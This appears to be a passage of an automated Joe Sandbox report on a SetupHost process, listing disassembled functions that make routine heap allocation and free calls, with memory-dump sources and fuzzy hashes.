                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$Process$AllocFree
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 756756679-0
                                                                                                                        • Opcode ID: f3fad137e3e5e7ca8b07d35c8bbc8268429dec1d74c6c71535a314fed615f056
                                                                                                                        • Instruction ID: a53a1920e7bfccd8e2b1f419f3144a3ed231519484ba1d1e79fde56d39a25b9b
                                                                                                                        • Opcode Fuzzy Hash: f3fad137e3e5e7ca8b07d35c8bbc8268429dec1d74c6c71535a314fed615f056
                                                                                                                        • Instruction Fuzzy Hash: F6211AB56047059FD7088F19D858A66BBE9FF9C311B158469E449CB3B1D770D980CBA0
                                                                                                                        Function 0052415C Relevance: 5.1, APIs: 4, Instructions: 56memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?,?,00000000,00000000,?,00000000), ref: 0052419C
                                                                                                                        • HeapFree.KERNEL32(00000000,?,00000000), ref: 005241A3
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?,?,00000000,00000000,?,00000000), ref: 005241D4
                                                                                                                        • HeapFree.KERNEL32(00000000,?,00000000), ref: 005241DB
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$FreeProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3859560861-0
                                                                                                                        • Opcode ID: 83e02d233c75852b8db41e46797188f4a8a73aceb3e46228c7fcbfe8455dc6e2
                                                                                                                        • Instruction ID: cb0c1ccf0a990778a278df6065971638863ffb9620b60fc71b1caa69e20a88da
                                                                                                                        • Opcode Fuzzy Hash: 83e02d233c75852b8db41e46797188f4a8a73aceb3e46228c7fcbfe8455dc6e2
                                                                                                                        • Instruction Fuzzy Hash: 43118236A00309ABCB109F99EC88A5ABBB9FFA8301F144468E55997290C770DD54CF50
                                                                                                                        Function 00525443 Relevance: 5.0, APIs: 4, Instructions: 36memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0052C97F: GetProcessHeap.KERNEL32(00000008,00000820,?,00000000,?,?,?,?,?,?,?,?,?,?,00525463,?), ref: 0052C9B5
                                                                                                                          • Part of subcall function 0052C97F: HeapAlloc.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00525463,?), ref: 0052C9BC
                                                                                                                          • Part of subcall function 0052C97F: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000), ref: 0052CAFE
                                                                                                                          • Part of subcall function 0052C97F: HeapFree.KERNEL32(00000000,?,00000000), ref: 0052CB05
                                                                                                                          • Part of subcall function 0052C97F: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000), ref: 0052CB1B
                                                                                                                          • Part of subcall function 0052C97F: HeapFree.KERNEL32(00000000,?,00000000), ref: 0052CB22
                                                                                                                          • Part of subcall function 0052C97F: GetProcessHeap.KERNEL32(00000000,?,?,00000000), ref: 0052CB32
                                                                                                                          • Part of subcall function 0052C97F: HeapFree.KERNEL32(00000000,?,00000000), ref: 0052CB39
                                                                                                                          • Part of subcall function 0052C97F: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000), ref: 0052CB46
                                                                                                                          • Part of subcall function 0052C97F: HeapFree.KERNEL32(00000000,?,00000000), ref: 0052CB4D
                                                                                                                          • Part of subcall function 0052C97F: SetLastError.KERNEL32(00000000,?,00000000), ref: 0052CB54
                                                                                                                        • GetLastError.KERNEL32(?), ref: 00525467
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?), ref: 0052547A
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 00525481
                                                                                                                        • SetLastError.KERNEL32(00000000,?), ref: 00525491
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$Process$Free$ErrorLast$Alloc
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 646459838-0
                                                                                                                        • Opcode ID: 63f48db1ac541d4647e8ff00a23f3aa5424ed1a7a02af7fbbe69f76e9b1a6c56
                                                                                                                        • Instruction ID: 47fb58a44d9856c84fffc979d0b93f47cdad7f419564413a5c11c8510dd4fa61
                                                                                                                        • Opcode Fuzzy Hash: 63f48db1ac541d4647e8ff00a23f3aa5424ed1a7a02af7fbbe69f76e9b1a6c56
                                                                                                                        • Instruction Fuzzy Hash: 45F06276D10328BBCB00EBF4A90D79EBBB8AF19753F118561E905E7080E6349A44DB90
                                                                                                                        Function 005283DA Relevance: 5.0, APIs: 4, Instructions: 34memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000018,00000000,00527299,?,00000000,?,005276BB,?,?,?,?), ref: 005283E1
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,00000000,?,005276BB,?,?,?,?), ref: 005283E8
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00001144,?,00000000,?,005276BB,?,?,?,?), ref: 00528402
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,00000000,?,005276BB,?,?,?,?), ref: 00528409
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$AllocProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1617791916-0
                                                                                                                        • Opcode ID: ec7b33fe44de31437b5f92a387ccbb5d66351966fe5cb7146f857150a3e37dc9
                                                                                                                        • Instruction ID: 715bd24a72af046a2b42f576d627519ab8f370f827680100c02de8517b641e8f
                                                                                                                        • Opcode Fuzzy Hash: ec7b33fe44de31437b5f92a387ccbb5d66351966fe5cb7146f857150a3e37dc9
                                                                                                                        • Instruction Fuzzy Hash: 26F0F6706457228BD7245FA5BC1C7A37DE1BF54716F04C518E1098A6D4DF7485089FD0
                                                                                                                        Function 0052801A Relevance: 5.0, APIs: 4, Instructions: 33memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,0000436C,?,00000000,00527204), ref: 00528027
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,00000000,00527204), ref: 0052802E
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00528062
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 00528069
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$Process$AllocFree
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 756756679-0
                                                                                                                        • Opcode ID: 1699e18e9cd659acf352d0e112c1f9c952bc32cd53e6549b65d7227f09ba3179
                                                                                                                        • Instruction ID: 64bc75f808114d8f91d7b25edf249500135606bd9d196e34fef6de6aa0b216b8
                                                                                                                        • Opcode Fuzzy Hash: 1699e18e9cd659acf352d0e112c1f9c952bc32cd53e6549b65d7227f09ba3179
                                                                                                                        • Instruction Fuzzy Hash: 1FF082756097256BC33067617C1CB273EA9BF99711F058418B509C65D4CF74C809CAA0
                                                                                                                        Function 005280CB Relevance: 5.0, APIs: 4, Instructions: 32memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?,?,00000000,00527292,?,00000000,?,005276BB,?,?,?,?), ref: 005280DA
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,00000000,?,005276BB,?,?,?,?), ref: 005280E1
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,?,005276BB,?,?,?,?), ref: 00528113
                                                                                                                        • HeapFree.KERNEL32(00000000,?,00000000,?,005276BB,?,?,?,?), ref: 0052811A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$Process$AllocFree
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 756756679-0
                                                                                                                        • Opcode ID: 572cefe7a72a0307d5dd7fc74dd19f6b2b71626d8d9ecc682fb819340ae3d362
                                                                                                                        • Instruction ID: e8c4f640da6be492a2c76c927e835fb09fc0472f6d8165523d7f9c7e162f5f12
                                                                                                                        • Opcode Fuzzy Hash: 572cefe7a72a0307d5dd7fc74dd19f6b2b71626d8d9ecc682fb819340ae3d362
                                                                                                                        • Instruction Fuzzy Hash: E7F0BE316057225BC3204BA5B81CB6BBEE8BF99312F044929E00AC21D0CF70D809CBA0
                                                                                                                        Function 005281B0 Relevance: 5.0, APIs: 4, Instructions: 25memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 005281C8
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 005281CF
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 005281E0
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 005281E7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$FreeProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3859560861-0
                                                                                                                        • Opcode ID: d04b717d62f6fe2397c5d1dcd87af98e1c959cb375c0fd976ef86fdf8d3828f1
                                                                                                                        • Instruction ID: bf76703057baed3df10fbb82c10d504e510a10393a606a12d20f05b3a9c9b886
                                                                                                                        • Opcode Fuzzy Hash: d04b717d62f6fe2397c5d1dcd87af98e1c959cb375c0fd976ef86fdf8d3828f1
                                                                                                                        • Instruction Fuzzy Hash: 8FE0ED32506724A7D7301F95BD0CB677FACAF29B93F040459B509924D0CB70A518DAA1
                                                                                                                        Function 005402D6 Relevance: 5.0, APIs: 4, Instructions: 18memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,00000000,0054019C), ref: 005402E4
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 005402EB
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,00000000,0054019C), ref: 005402F4
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 005402FB
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$FreeProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3859560861-0
                                                                                                                        • Opcode ID: 8b732258a1ef69b77eace6d69317321fd7133b339f88225814c26a6c5face59d
                                                                                                                        • Instruction ID: 8f0e37597c6299f70e36f4c05e1c85cabb694c1eab842c70d9091d27b4b94855
                                                                                                                        • Opcode Fuzzy Hash: 8b732258a1ef69b77eace6d69317321fd7133b339f88225814c26a6c5face59d
                                                                                                                        • Instruction Fuzzy Hash: 42D0173A108325ABC7201BA4BC1CB8B7EA8AB6C753F140459B249920E0CAB04844EB60